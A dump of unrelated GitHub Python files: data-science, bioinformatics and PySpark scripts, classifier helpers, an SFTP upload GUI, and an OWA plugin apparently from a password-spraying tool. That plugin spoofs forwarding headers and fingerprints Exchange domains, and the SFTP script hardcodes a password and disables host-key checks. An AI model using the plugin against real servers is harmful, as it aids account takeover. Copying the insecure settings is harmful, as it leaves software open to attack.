else:\n test_model_files.append(dict_models[\"testFiles\"][j])\n test_model_ts_vals.append(ts)\n\n ts_null_mean = np.mean(ts_null)\n ts_null_std = np.std(\n ts_null\n ) # for one control run per model, otherwise also need to compute the variance\n print(\n str(i)\n + \" --- \"\n + models[i]\n + \" 
--- mean = \"\n                + str(ts_null_mean)\n                + \" --- std = \"\n                + str(ts_null_std)\n            )\n\n            alpha = 0\n            power = 0\n            nb_control_runs = 0\n            nb_forced_runs = 0\n            for k in range(len(test_model_files)):\n                print(test_model_files[k])\n                if (\n                    test_model_ts_vals[k]\n                    > ts_null_mean\n                    + 1.96 * ts_null_std # 1.96 (95%) or 2.326 (98%)\n                    or test_model_ts_vals[k]\n                    < ts_null_mean - 1.96 * ts_null_std\n                ):\n                    test_val = 1 # Reject H0\n                else:\n                    test_val = 0\n\n                # TO DO: extend for other forcings\n                if test_model_files[k].split(\"_\")[3] == \"piControl\":\n                    nb_control_runs = nb_control_runs + 1\n                    if test_val == 1:\n                        alpha = alpha + 1\n                elif test_model_files[k].split(\"_\")[3] != \"piControl\":\n                    nb_forced_runs = nb_forced_runs + 1\n                    if test_val == 1:\n                        power = power + 1\n\n                print(\n                    test_model_files[k].split(\"_\")[3]\n                    + \" --- test = \"\n                    + str(test_val)\n                )\n\n            print(\"nb_controls = \" + str(nb_control_runs))\n            print(\"nb_forced = \" + str(nb_forced_runs))\n            print(\"alpha = \" + str(alpha))\n            print(\"power = \" + str(power))\n\n            if nb_control_runs != 0:\n                alpha_per_bag[i] = alpha / nb_control_runs\n            if nb_forced_runs != 0:\n                power_per_bag[i] = power / nb_forced_runs\n            nb_models_per_bag[i] = 1\n\n    print(alpha_per_bag)\n    print(power_per_bag)\n\n    return alpha_per_bag, power_per_bag, nb_models_per_bag\n","repo_name":"eszekely/robustDA","sub_path":"robustDA/hypothesis_testing.py","file_name":"hypothesis_testing.py","file_ext":"py","file_size_in_byte":19152,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"17813706521","text":"\"\"\"\nDESCRIPTION:\n(1) Map reads to host genome (bowtie2)\n(2) Convert sam to bam, sort bam, compute depth (samtools)\n\nARGUMENTS:\nargs[1] = sample name prefix of the paired fastq files (without _1/_2)\nargs[2] = reference genome index name\nargs[3] = number of threads\n\"\"\"\n\nimport os\nimport sys\nimport time\nimport main\n\nhome = \"/rds/general/user/cl3820/\"\n\nargs = sys.argv\n\nfile1 = args[1]+\"_1\"\nfile2 = args[1]+\"_2\"\n\nfq_gz1 = home+\"home/clean_data/\"+file1+\".fq.gz\"\nfq_gz2 = home+\"home/clean_data/\"+file2+\".fq.gz\"\n\nprint(\"Reference genome: \"+args[2])\nprint(\"Start mapping...\")\n\n#mapping through bowtie2\nstart = time.time()\nmain.bowtie2_map(fasta1=fq_gz1,fasta2=fq_gz2,index=home+\"home/reference_genome/\"+args[2],sam=home+\"home/bowtie2/\"+args[1]+\".sam\",unmap=home+\"home/bowtie2/\"+args[1]+\"_filterhost.fq\",threads=args[3])\nend = time.time()\nprint(\"Filter host:\"+str(end-start))\n\n#Sort bam\nstart = time.time()\nmain.sort_bam(bam=home+\"home/bowtie2/\"+args[1]+\".sam.bam\",out=home+\"home/bowtie2/\"+args[1]+\"_sorted.bam\",threads=args[3])\nend = time.time()\nprint(\"Sort bam:\"+str(end-start))\n\n#Compute depth\nstart = time.time()\nmain.compute_depth(bam=home+\"home/bowtie2/\"+args[1]+\"_sorted.bam\",out=home+\"home/bowtie2/depth_\"+args[1]+\"_\"+args[2]+\".txt\")\nend = time.time()\nprint(\"Compute depth:\"+str(end-start))\n","repo_name":"CongLiu37/PlayGround","sub_path":"Code/2_FilterHost.py","file_name":"2_FilterHost.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19483472911","text":"import sys\n\nfrom pyspark.sql import SparkSession, DataFrame\nfrom pyspark.sql.functions import *\n\n'''\nThis pyspark script reads csv data of the electric vehicle population,\nremoves records with null vin,\nreplaces any null values with space,\nremoves special chars (*#) from all the columns,\nand writes to a parquet table.\n'''\nelectric_vehicle_population_data = sys.argv[1]\n\n
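# Assumed invocation: spark-submit data_cleaning.py path/to/electric_vehicle_population.csv\n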
spark = SparkSession.builder.appName(\"Pyspark-Electric-Vehicle-Population - Ingestion\").getOrCreate()\nspark.sparkContext.setLogLevel('WARN')\n\n# set up logger using spark logger\nlog4jLogger = spark._jvm.org.apache.log4j\nlogger = log4jLogger.LogManager.getLogger(__name__)\n\nlogger.info(\"pyspark electric vehicle script logger initialized\")\n\nlogger.info(\"electric_vehicle_population_data: \" + electric_vehicle_population_data)\n\n\ndef write_to_table(output_df, table_name):\n    # Check if already exists or not\n    # If already exists append the data or create table on the fly\n\n    if spark.catalog.tableExists(table_name):\n        output_df.write.mode(\"append\").format(\"parquet\").partitionBy(*[\"country\", \"state\"]).saveAsTable(table_name)\n    else:\n        output_df.write.mode(\"overwrite\").format(\"parquet\").partitionBy(*[\"country\", \"state\"]).saveAsTable(table_name)\n\n\ndef clean_df(df: DataFrame) -> DataFrame:\n    # Replace char * and # with space\n    for col_name in df.columns:\n        df = df.withColumn(col_name, regexp_replace(col(col_name), \"[\\\\*|\\\\#]\", \"\"))\n    return df\n\n\ndef read_csv(in_path: str, delimiter: str, header: str) -> DataFrame:\n    # Reading csv with inferschema.\n    # Enabling infer schema will do two read operations, which will not be good idea, better to provide schema explicitly\n    return spark.read.format(\"csv\") \\\n        .option(\"header\", header) \\\n        .option(\"inferSchema\", \"true\") \\\n        .option(\"delimiter\", delimiter) \\\n        .option(\"quote\", '\"') \\\n        .option(\"escape\", '\"') \\\n        .load(in_path)\n\n\ntry:\n    in_df = read_csv(electric_vehicle_population_data, \",\", \"true\").filter(col(\"vin\").isNotNull()).na.fill(\"\")\n    cleaned_df = clean_df(in_df)\n    write_to_table(cleaned_df, \"default.electric_vehicle_population\")\n    spark.stop()\n    logger.info(\"Application succeeded\")\nexcept Exception as e:\n    logger.error(\"Application failed with error: \" + str(e))\n    spark.stop()\n    raise e\n","repo_name":"venkateshur/Data-Engineer-Training---Batch1","sub_path":"py_spark/data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73317448568","text":"import glob\n\nchild_lst = []\nparent_lst = []\nlist_of_no_child = []\nlist_of_no_parents=[]\nnum_of_no_parents = 0\nlist_of_files = glob.glob('./files/*.txt')\nfor f in list_of_files:\n    child = f[8:-4]\n    child_lst.append(child)\n    parent = open(f).read()\n    parent_lst.append(parent)\n\n# Find the files that have no parent\n\n    if parent == \"0\":\n        list_of_no_parents.append(child)\n        num_of_no_parents += 1\nprint(num_of_no_parents, \"files has no parent.\")\nprint(\"list of files that has no parent:\", list_of_no_parents)\n\n# Save a sorted list of all files that have no child into no_children.txt\n\ndef difference (list1, list2):\n    list_dif = [i for i in list1 + list2 if i not in list2]\n    return list_dif\n\nno_child_list = sorted(difference(child_lst,parent_lst))\n\nno_children = open(\"no_children.txt\", mode=\"a\")\nfor i in range(len(no_child_list)):\n    no_children.write(no_child_list[i])\n    no_children.write(\"\\n\")\n\n# Find the longest possible path and save every member seen along it into longest_path.txt\n\ndef find_parents_children(key):\n    dic_p ={}\n    lst_ch = []\n    for f in list_of_files:\n        inside = open(f,mode=\"r\").read()\n        if inside == key:\n            name_of_file = f[8:-4]\n            lst_ch.append(name_of_file)\n    
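# Map this parent key to all of its children once the scan completes.\n    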
dic_p.update({key:lst_ch})\n\n return dic_p\n\nprint(find_parents_children(\"1073414247\"))\n\n\n#for i in range(len(list_of_no_parents)):\n #dic_key = list_of_no_parents[i]\ndic_of_parents = find_parents_children(\"1073414247\")\nchildren_in_dic_lst = dic_of_parents.get(\"1073414247\")\nfor j in range(len(children_in_dic_lst)):\n new_key = children_in_dic_lst[j]\n print(find_parents_children(new_key))\n\n","repo_name":"baharakd/bahar-py","sub_path":"files everywhere.py","file_name":"files everywhere.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"fa","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29325150067","text":"import ecuaciones1D as s\nx1 = 20\nx2 = 30\nH = 8\n\ndef F(x, x1, x2, H):\n return x**3 * (x-4*H) - (x1**2-x2**2)**2\nfrom functools import partial\n\nf = partial(F, x1=x1, x2=x2, H=H)\n\ns.biseccion(f, 0, 100)\n\nr = s.biseccion(f, 30, 40)\nx = r.x\n\ndef G(A, x, x1, x2):\n import math\n return A + math.sqrt(A**2-(x1**2-x2**2)) - x\ng = partial(G, x=x, x1=x1, x2=x2)\n\nR = s.biseccion(g, 10, 20)\nA = R.x\n\nimport math\nW = math.sqrt(x1**2 - A**2)\n","repo_name":"mlares/computacion_Famaf","sub_path":"ejemplos/raices/escaleras.py","file_name":"escaleras.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12246477207","text":"# Classifier Functions for the project\n# Rune Zeitzen\n# June 2023\n\n############################################# Import packages #############################################\n\nimport pandas as pd\nimport numpy as np\nfrom tensorflow import keras\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.utils import pad_sequences\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Embedding, LSTM, SpatialDropout1D, BatchNormalization\nfrom sklearn.model_selection import train_test_split\n\nfrom keras.models import load_model\nfrom sklearn.metrics import classification_report, confusion_matrix, roc_curve, auc\nfrom keras.callbacks import ModelCheckpoint\nfrom keras import regularizers\nimport os\nimport re\nimport time\nimport pickle\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n\n\n############################################# Helper Functions #############################################\n\ndef get_next_model_number(directory):\n # Get list of all files/directories in the given directory\n files = os.listdir(directory)\n \n # Initialize the highest model number found to 0\n highest_num = 0\n\n # Regular expression to match 'saved_model_{number}'\n pattern = re.compile(r'saved_model_(\\d+)\\.h5')\n \n # Iterate through all files/directories\n for file in files:\n match = pattern.match(file)\n \n # If this file/directory matches the pattern\n if match:\n # Extract the number from the filename\n num = int(match.group(1))\n \n # If this number is higher than any we've seen before, update highest_num\n if num > highest_num:\n highest_num = num\n\n # Return the next model number\n return highest_num + 1\n\ndef evaluate_model(model, X_test, y_test, plot = False, vocab_size = None, name = None):\n # Calculate loss and accuracy \n loss, accuracy = model.evaluate(X_test, y_test, verbose=0)\n print(\"Loss: \", loss)\n print(\"Accuracy: \", accuracy)\n\n # Generate predictions\n y_pre = model.predict(X_test)\n\n # Choose a threshold for classification\n y_pred = np.where(y_pre >= 0.5, 1, 0)\n\n # Calculate Confusion Matrix\n print(\"Confusion Matrix:\")\n conf_matrix = 
confusion_matrix(y_test, y_pred)\n print(conf_matrix)\n\n # Calculate Precision, Recall, F1 Score\n print(\"Classification Report:\")\n print(classification_report(y_test, y_pred))\n\n # Calculate ROC Curve and AUC\n fpr, tpr, thresholds = roc_curve(y_test, y_pre)\n roc_auc = auc(fpr, tpr)\n print(\"AUC of ROC Curve:\", roc_auc)\n\n if plot:\n # Create a figure\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 5))\n\n fig.suptitle(f'Confusion Matrix and ROC Curve\\nBest LSTM Model', fontsize=20, y = 1.05)\n\n # Plot confusion matrix\n sns.heatmap(conf_matrix, cmap='Blues', annot=True, fmt=\"d\", ax=ax1, vmin = 0)\n #ax1.set_title('Confusion Matrix')\n ax1.set_xlabel('Predicted Label')\n ax1.set_ylabel('True Label')\n\n # Plot ROC curve\n ax2.plot(fpr, tpr, color='b', label='ROC curve (area = %0.2f)' % roc_auc)\n ax2.plot([0, 1], [0, 1], color='k', linestyle='--')\n ax2.set_xlim([-0.01, 1.01])\n ax2.set_ylim([-0.01, 1.01])\n ax2.set_xlabel('False Positive Rate')\n ax2.set_ylabel('True Positive Rate')\n plot_params(ax2)\n\n data = [accuracy, loss, roc_auc, vocab_size]\n \n string = f'Accuracy: {data[0]:.4f}\\nBCE (LogLoss): {data[1]:.4f}\\nROC AUC: {data[2]:.3f}\\n\\nVocabulary Size: {data[3]}'\n plot_text(ax2, 0.5, 0.1, string, size = 12, box = True, color = 'k', font_style = 'italic')\n\n # Save the figure\n plt.savefig(f'Result_Models/RNN/evaluation_RNNLSTM_{name}_{vocab_size}.png', dpi=300, bbox_inches='tight')\n\n plt.show()\n\n # Return all metrics\n return loss, accuracy, y_pre, y_pred, roc_auc\n\n\n############################################# RNN-LSTM Function #############################################\n\ndef RNN_LSTM(data, labels, epoch = 20, batchsize = 256 * 8, max_features = 10000, names = None, plotIT = False, train = None):\n \"\"\"\n Function to run a RNN-LSTM model on the data.\n data: dataframe with columns 'title', 'text' and 'label'\n lables: labels for the data\n epochs: number of epochs to train the model\n batchsize: batch size to train the model \n name: name of the model ( used to save the model )\n \"\"\"\n\n name = get_next_model_number('Result_Models/RNN_MODELS')\n\n X_train, X_val, y_train, y_val = train_test_split(data, labels, test_size=0.3, random_state=42)\n\n X_val, X_test, y_val, y_test = train_test_split(X_val, y_val, test_size=0.5, random_state=42)\n\n ############################################# Train the model #############################################\n\n if train is None:\n\n train = input('\\nTrain the model? (y/n): ')\n\n if train == 'y':\n\n model = Sequential()\n model.add(Embedding(max_features, 32)) \n model.add(LSTM(32, dropout=0.2, recurrent_dropout=0.2)) \n model.add(Dense(1, activation='sigmoid', kernel_regularizer=regularizers.l2(0.01))) \n \n batch_size = batchsize\n epochs = epoch\n\n optimize = keras.optimizers.legacy.Adam(lr = 0.001)\n\n model.compile(loss='binary_crossentropy',\n optimizer=optimize,\n metrics=['accuracy'])\n\n print(model.summary())\n\n # Specify the path where you want to save the model\n filepath = f\"Result_Models/RNN_MODELS/saved_model_{name}.h5\"\n\n # Initialize ModelCheckpoint\n checkpoint = ModelCheckpoint(filepath, monitor='val_loss', verbose=1, save_best_only=True, mode='min')\n\n # Pass the ModelCheckpoint callback to model.fit() function\n history = model.fit(X_train, y_train, \n batch_size=batch_size, \n epochs=epochs, \n validation_data=(X_val, y_val),\n callbacks=[checkpoint])\n \n if not plotIT:\n plot = input('\\nPlot the loss? 
(y/n): ')\n\n        else:\n            plot = 'y'\n\n        if plot == 'y':\n\n            fig, ax = plt.subplots(figsize=(7,4))\n            ax.plot(history.history['loss'], label='Train', color = 'k')\n            ax.plot(history.history['val_loss'], label='Validation', color = 'b')\n            ax.set_title('Model Loss vs Epoch')\n            ax.set_ylabel('Loss')\n            ax.set_xlabel('Epoch')\n            ax.set_xticks(np.arange(0, epochs+1, 5))\n            legend(ax, loc='upper right')\n            plot_params(ax)\n            plt.tight_layout()\n            plt.savefig(f'Result_Models/RNN/loss_{names}_{max_features}.png', dpi=300, bbox_inches='tight')\n            plt.show()\n\n            if not plotIT:\n                save = input('\\nSave the plot? (y/n): ')\n\n            else:\n                save = 'y'\n            if save in ('n', ''):\n                os.remove(f'Result_Models/RNN/loss_{names}_{max_features}.png')\n\n\n    model_best = load_model(f'Result_Models/RNN_MODELS/saved_model_{name}.h5')\n\n    \n    if train == 'n' or train == '':\n        name_in = input('\\nName of the model: ')\n        model_best = load_model(f'Result_Models/RNN_MODELS/saved_model_{name_in}.h5')\n\n    ############################################# Evaluate the model #############################################\n\n    print('\\nEvaluating the model...')\n\n    loss, accuracy, y_pre, y_pred, roc_auc = evaluate_model(model_best, X_test, y_test, plot = plotIT, vocab_size=max_features, name = names)\n\n\nfrom lightgbm import LGBMClassifier\nfrom lightgbm import early_stopping, log_evaluation\nfrom sklearn.metrics import accuracy_score, log_loss, confusion_matrix, roc_auc_score\n\nimport matplotlib.pyplot as plt\n\n\ndef LightGBM(X_train, y_train, X_test, y_test):\n    \"\"\"\n    Trains a LightGBM binary classifier on the provided training data, \n    then makes predictions on the test data and evaluates the model's performance.\n\n    Parameters\n    ----------\n    X_train : array-like of shape (n_samples, n_features)\n        The training input samples.\n    y_train : array-like of shape (n_samples,)\n        The target values (class labels) as integers or strings.\n    X_test : array-like of shape (n_samples, n_features)\n        The test input samples; half is held out internally as a validation set.\n    y_test : array-like of shape (n_samples,)\n        The true values (class labels) for the test input samples.\n\n    Returns\n    -------\n    accuracy : float\n        The accuracy of the model on the test data.\n    bce_loss : float\n        The binary cross-entropy loss of the model on the test data.\n    conf_matrix : ndarray of shape (n_classes, n_classes)\n        The confusion matrix of the model's predictions on the test data.\n    roc_auc : float\n        The ROC AUC score of the model on the test data.\n    y_pred : ndarray of shape (n_samples,)\n        Predicted class labels on the held-out half of the test data.\n    y_pred_prob : ndarray of shape (n_samples,)\n        Predicted probabilities for the positive class.\n    clf : LGBMClassifier\n        The fitted classifier.\n    y_test_new : array-like of shape (n_samples,)\n        True labels of the held-out half of the test data.\n    \"\"\"\n\n    print(\"\\nSplitting test data into validation and test sets...\")\n\n    X_val, X_test_new, y_val, y_test_new = train_test_split(X_test, y_test, test_size=0.5)\n\n    print(\"\\nTraining LightGBM classifier...\")\n\n    # Initialize our classifier with specified parameters to combat overfitting\n    clf = LGBMClassifier(n_estimators=100, learning_rate=0.01, max_depth=3, subsample=0.8, reg_alpha=0.1, reg_lambda=0.1)\n\n    # Train the classifier\n    clf.fit(X_train, y_train, eval_set=(X_val, y_val), early_stopping_rounds=50, verbose=False)\n\n    print(\"\\nEvaluating model...\")\n\n    # Make predictions on the new test set\n    y_pred = clf.predict(X_test_new)\n\n    # Predict probabilities for log loss\n    y_pred_prob = 
clf.predict_proba(X_test_new)\n\n # Calculate accuracy\n accuracy = accuracy_score(y_test_new, y_pred)\n print(f\"\\nAccuracy: {accuracy}\")\n\n # Calculate log loss (binary cross entropy)\n bce_loss = log_loss(y_test_new, y_pred_prob)\n print(f\"\\nBinary Cross Entropy Loss: {bce_loss}\")\n\n # Calculate confusion matrix\n conf_matrix = confusion_matrix(y_test_new, y_pred)\n print(f\"\\nConfusion Matrix: \\n{conf_matrix}\")\n\n # Calculate ROC AUC score\n roc_auc = roc_auc_score(y_test_new, y_pred_prob[:,1])\n print(f\"\\nROC AUC Score: {roc_auc}\")\n\n return accuracy, bce_loss, conf_matrix, roc_auc, y_pred, y_pred_prob[:,1], clf, y_test_new\n\n\n####################\n\ndef plot_params(ax, xlim = None, ylim = None, minor_grid = True, labsize = 12, xlocator = None, ylocator = None, log = (False,False)):\n\n ax.minorticks_on()\n ax.tick_params(axis='both', length = 10, which='major', labelsize=labsize)\n ax.tick_params(axis='both', length = 5, which='minor', labelsize=labsize)\n ax.grid(which = 'major',linestyle = ':',color = '0.25')\n \n if minor_grid:\n ax.grid(which = 'minor',linestyle = ':',color = '0.75')\n\n if xlim is not None:\n ax.set_xlim(xlim)\n\n if ylim is not None:\n ax.set_ylim(ylim)\n\n if xlocator is not None:\n from matplotlib.ticker import AutoMinorLocator\n minor_locator = AutoMinorLocator(xlocator)\n ax.xaxis.set_minor_locator(minor_locator)\n if ylocator is not None:\n from matplotlib.ticker import AutoMinorLocator\n minor_locator = AutoMinorLocator(ylocator)\n ax.yaxis.set_minor_locator(minor_locator)\n\n\n if log[0]:\n ax.set_xscale('log')\n if log[1]:\n ax.set_yscale('log')\n\n####################\n\ndef legend(ax, loc = 'lower left', size = 10, cols = None, fancy = False, shad = True, title = None, titsize = 12, bbox_to_anchor = None):\n if bbox_to_anchor is None:\n if title is None:\n if cols is None:\n ax.legend(loc=loc,prop={'size': size},framealpha = 1, facecolor = '1',edgecolor = 'black', shadow = shad, fancybox = fancy)\n if cols is not None:\n ax.legend(loc=loc,ncol = cols,prop={'size': size},framealpha = 1, facecolor = '1',edgecolor = 'black', shadow = shad, fancybox = fancy)\n if bbox_to_anchor is not None:\n if title is not None:\n if cols is None:\n ax.legend(loc=loc,prop={'size': size},framealpha = 1, facecolor = '1',edgecolor = 'black', shadow = shad, fancybox = fancy, title = title, title_fontsize = titsize, bbox_to_anchor = bbox_to_anchor)\n if cols is not None:\n ax.legend(loc=loc,ncol = cols,prop={'size': size},framealpha = 1, facecolor = '1',edgecolor = 'black', shadow = shad, fancybox = fancy,title = title, title_fontsize = titsize, bbox_to_anchor = bbox_to_anchor)\n\n####################\n\ndef plot_text(ax, x, y, string, size = 12, box = True, color = 'k', font_style = 'normal'):\n if box:\n return ax.text(x, y, string,c = color,size = size,bbox=dict(boxstyle='Square', facecolor='white', alpha=1), family='monospace', fontstyle = font_style)\n else:\n return ax.text(x, y, string,c = color,size = size, family='monospace', fontstyle = font_style)\n\n# Plot the confusion matrix and ROC curve\ndef plot_confusion_matrix_and_roc(y_test, y_pred, y_pred_probs, name, vobab, type = 'LightGBM', data = None):\n\n font = {'family': 'monospace'}\n plt.rc('font', **font)\n\n # Compute the confusion matrix\n conf_matrix = confusion_matrix(y_test, y_pred)\n\n # Compute ROC curve and ROC area\n fpr, tpr, _ = roc_curve(y_test, y_pred_probs)\n roc_auc = auc(fpr, tpr)\n\n # Create a figure\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 5))\n\n 
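# Shared figure title; y=1.05 lifts it clear of the two panels so it does\n    # not collide with the per-axes labels.\n    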
fig.suptitle(f'Confusion Matrix and ROC Curve\\nBest {type} Model', fontsize=20, y = 1.05)\n\n # Plot confusion matrix\n sns.heatmap(conf_matrix, cmap='Blues', annot=True, fmt=\"d\", ax=ax1, vmin = 0)\n #ax1.set_title('Confusion Matrix')\n ax1.set_xlabel('Predicted Label')\n ax1.set_ylabel('True Label')\n\n # Plot ROC curve\n ax2.plot(fpr, tpr, color='b', label='ROC curve (area = %0.2f)' % roc_auc)\n ax2.plot([0, 1], [0, 1], color='k', linestyle='--')\n ax2.set_xlim([-0.01, 1.01])\n ax2.set_ylim([-0.01, 1.01])\n ax2.set_xlabel('False Positive Rate')\n ax2.set_ylabel('True Positive Rate')\n #ax2.set_title('Receiver Operating Characteristic')\n if data is None:\n legend(ax2,loc='lower right')\n plot_params(ax2)\n\n if data is not None:\n string = f'Accuracy: {data[0]:.4f}\\nBCE (LogLoss): {data[1]:.4f}\\nROC AUC: {data[2]:.3f}\\n\\nVocabulary Size: {data[3]}'\n plot_text(ax2, 0.5, 0.1, string, size = 12, box = True, color = 'k', font_style = 'italic')\n\n # Save the figure\n plt.savefig(f'Result_Models/Tree/evaluation_{type}_{name}_{vobab}.png', dpi=300, bbox_inches='tight')\n\n plt.show()\n\n####################\n\nimport numpy as np\nfrom sklearn.model_selection import learning_curve\nimport matplotlib.pyplot as plt\nfrom lightgbm import LGBMClassifier\n\ndef plot_learning_curve(model, X, y, cv = 5, num = 10):\n\n\n train_sizes, train_scores, test_scores = learning_curve(model, X, y, cv=cv, train_sizes=np.linspace(0.1, 1.0, num))\n\n train_scores_mean = np.mean(train_scores, axis=1)\n train_scores_std = np.std(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n test_scores_std = np.std(test_scores, axis=1)\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std, train_scores_mean + train_scores_std, alpha=0.1, color='r')\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std, test_scores_mean + test_scores_std, alpha=0.1, color='g')\n\n plt.plot(train_sizes, train_scores_mean, 'o-', color='r', label='Training score')\n plt.plot(train_sizes, test_scores_mean, 'o-', color='g', label='Cross-validation score')\n\n plt.title('Learning curves with error bars')\n plt.xlabel('Training examples')\n plt.ylabel('Score')\n plt.legend(loc='best')\n plt.show()\n\n####################\n\nfrom sklearn.model_selection import cross_val_score\n\ndef cross_val(model, X, y, cv = 5):\n scores = cross_val_score(model, X, y, cv=cv)\n\n print(\"Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n\n return scores","repo_name":"Chrowian/Final_Project_GutQuaadeHaldorZeitzen","sub_path":"classifier_funcs.py","file_name":"classifier_funcs.py","file_ext":"py","file_size_in_byte":16447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37596622949","text":"import requests\nimport utils.utils as utils\nfrom urllib.parse import urlparse\nfrom credmaster import log_entry\nrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)\n\npaths = {'OWA version 2003': '/exchweb/bin/auth/owaauth.dll',\n 'OWA version 2007': '/owa/auth/owaauth.dll',\n 'OWA version > 2007': '/owa/auth.owa'}\n\ndef check_url(url):\n r = requests.get(url, verify=False)\n return r.status_code\n\ndef check_path(url):\n current_path = urlparse(url).path\n if not current_path or current_path == \"/\":\n srv = url.rstrip('/') # just in case\n log_entry('Trying to guess OWA version. 
Please wait...')\n for key, value in paths.items():\n url_value = srv + value\n if check_url(url_value) == 200:\n log_entry('Looks like %s' % key)\n log_entry('Using \"%s\" as a target' % url_value)\n return url_value\n else:\n log_entry('[!] Unable to find OWA - using \"%s\" as a target' % url)\n return url\n\n\ndef validate(pluginargs, args):\n #\n # Plugin Args\n #\n # --url https://mail.domain.com -> OWA mail target\n #\n if 'url' in pluginargs.keys():\n return True, None, pluginargs\n else:\n error = \"Missing url argument, specify as --url https://mail.domain.com\"\n return False, error, None\n\n\ndef testconnect(pluginargs, args, api_dict, useragent):\n\n url = api_dict['proxy_url']\n\n success = True\n headers = {\n 'User-Agent': useragent,\n \"X-My-X-Forwarded-For\" : utils.generate_ip(),\n \"x-amzn-apigateway-api-id\" : utils.generate_id(),\n \"X-My-X-Amzn-Trace-Id\" : utils.generate_trace_id(),\n }\n\n headers = utils.add_custom_headers(pluginargs, headers)\n\n server_url = pluginargs['url']\n owa_server = check_path(pluginargs['url'])\n\n resp = requests.get(url, headers=headers, verify=False)\n\n if resp.status_code == 504:\n output = \"Testconnect: Connection failed, endpoint timed out, exiting\"\n success = False\n else:\n output = \"Testconnect: Fingerprinting host... Internal Domain name: {domain}, continuing\"\n\n if success:\n domainname = utils.get_owa_domain(server_url, \"/autodiscover/autodiscover.xml\", useragent)\n output = output.format(domain=domainname)\n pluginargs['domain'] = domainname\n pluginargs['url'] = owa_server\n\n return success, output, pluginargs\n","repo_name":"SecurIT360/CredMaster-S360Fork","sub_path":"plugins/owa/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"20285146827","text":"'''\nStudentID: 20CS061\nStudent Name: Tarsh Pathak\nAIM: Write a Python script to merge two Python dictionaries\n '''\n#Create Dictionary\nmydict1 = {\"fast\": \"In a quick manner\",\n \"Sam\": \"A coder\",\n \"marks\": [2, 3, 4, 5],\n \"anotherDict\": {'Tarsh': 'Player'},\n 1: 2}\n# Creating a Dictionary to update the values\nupdateDict = {\n 'Lovish': 'Friend',\n \"Shubham\": \"Friend\",\n \"Divya\": \"Friend\",\n \"Sam\": \"A Dancer\",\n}\n# Using update function to update and add the values to mydict1\nmydict1.update(updateDict)\nprint(mydict1)","repo_name":"Tarsh26/Python-Assignment-20CS061-","sub_path":"Dictionary/02_dictionary.py","file_name":"02_dictionary.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72530335610","text":"import PyQt5\nfrom PyQt5 import QtWidgets, uic\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QPushButton, QLabel, QFileDialog\nimport pysftp as sftp\n\nimport sys\nimport os\n\n#SFTP Server Setup\nHOST = \"sftp.alexpro.net\"\nPORT = 22\nUSER_NAME = \"team6\"\nPASSWORD = \"sftpPipeline\"\ncnopts = sftp.CnOpts()\ncnopts.hostkeys=None\n\nnewPreset = []\n\n#Connect to SFTP Server\ntry:\n connection = sftp.Connection(host=HOST, username=USER_NAME, password=PASSWORD, cnopts=cnopts)\n print(\"Connected!\")\n connection.cwd(\"./team6\")\n print(connection.pwd)\nexcept:\n print(\"failed to establish connection\")\n\nclass MainWindow(QtWidgets.QMainWindow):\n def __init__(self):\n \n super(MainWindow,self).__init__()\n #load UI File\n #uic.loadUi(\"guitest.ui\",self)\n 
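# NOTE: the absolute path below is machine-specific; the commented relative\n        # path above is the portable alternative when running from the project root.\n        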
uic.loadUi(r'C:\\Users\\steve\\team-6-sftp-pipeline\\Views\\guitest.ui',self)\n        \n        #Define Widgets\n        self.Browse_Button = self.findChild(QPushButton, \"BrowseButton\")\n        self.Output_Label = self.findChild(QLabel, \"File_Name_Output\")\n        \n        self.Preset_Button = self.findChild(QPushButton, \"PresetButton\")\n        self.Preset_Label = self.findChild(QLabel, \"PresetText\")\n        \n        self.Undo_Button = self.findChild(QPushButton, \"Undo_Button\")\n        self.Undo_Button.setEnabled(False)\n        \n        #Connect Browse_Button to clicker function\n        self.Browse_Button.clicked.connect(self.upload_clicker)\n        self.Preset_Button.clicked.connect(self.presetClicker)\n        self.Undo_Button.clicked.connect(self.undo_clicker)\n        \n        #Show App\n        self.show()\n    \n    #Upload File Button Clicked\n    def upload_clicker(self):\n        #Open File Dialog\n        global fname_basefile\n        \n        fname = QFileDialog.getOpenFileName(self, \"Open Files\", \"C:\", \"All Files (*)\")\n        fname_basefile = os.path.basename(fname[0])\n        \n        print(\"Uploaded File: \" + fname_basefile)\n        \n        #File Upload\n        local_path = fname\n        remote_path = \"/root/team6\"\n        #Upload Command\n        connection.put(fname[0], preserve_mtime=True)\n        #Output success message\n        print(\"File \" + fname_basefile + \" uploaded successfully!\")\n        \n        #output file name to screen\n        if fname:\n            self.File_Name_Output.setText(\"File \" + fname_basefile + \" uploaded successfully!\")\n        \n        #enable undo button after upload\n        self.Undo_Button.setEnabled(True)\n    \n    def undo_clicker(self):\n        \n        connection.get(fname_basefile, preserve_mtime=True, 